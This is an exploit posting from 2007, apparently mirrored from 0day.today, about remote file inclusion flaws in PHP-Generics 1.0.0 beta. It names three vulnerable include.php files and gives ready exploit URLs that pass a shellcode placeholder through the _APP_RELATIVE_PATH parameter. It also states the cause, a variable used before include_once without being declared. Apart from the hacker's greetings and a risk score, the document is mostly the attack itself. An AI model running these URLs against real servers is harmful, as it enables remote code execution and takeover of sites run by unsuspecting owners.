PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilities

🗓️ 05 Apr 2007 00:00:00Reported by bd0rkType

zdt🔗 0day.today👁 22 Views

PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilitie

======================================================================
PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilities
======================================================================



                  --------------------------------------------------------
                 
                                           
                   php-generics 1.0 Remote File Inclusion Vulnerabilities
                 
                  --------------------------------------------------------


Software: php-generics 1.0Beta

Bugfounder: bd0rk

Vulnerable files: include.php, /dbcommon/include.php, /exception/include.php

[+]Exploit 1: http://[target]/[directory]/include.php?_APP_RELATIVE_PATH=[ShellCode]

[+]Exploit 2: http://[target]/[directory]/dbcommon/include.php?_APP_RELATIVE_PATH=[ShellCode]

[+]Exploit 3: http://[target]/[directory]/exception/include.php?_APP_RELATIVE_PATH=[ShellCode]

Problem: $_APP_RELATIVE_PATH is not declared before include_once and no configfile is aviable

Greetings: str0ke, TheJT, HaSSPappeL ;-)

#The 18 years old, german Hacker bd0rk



#  0day.today [2018-04-13]  #

05 Apr 2007 00:00Current

7.1High risk

Vulners AI Score7.1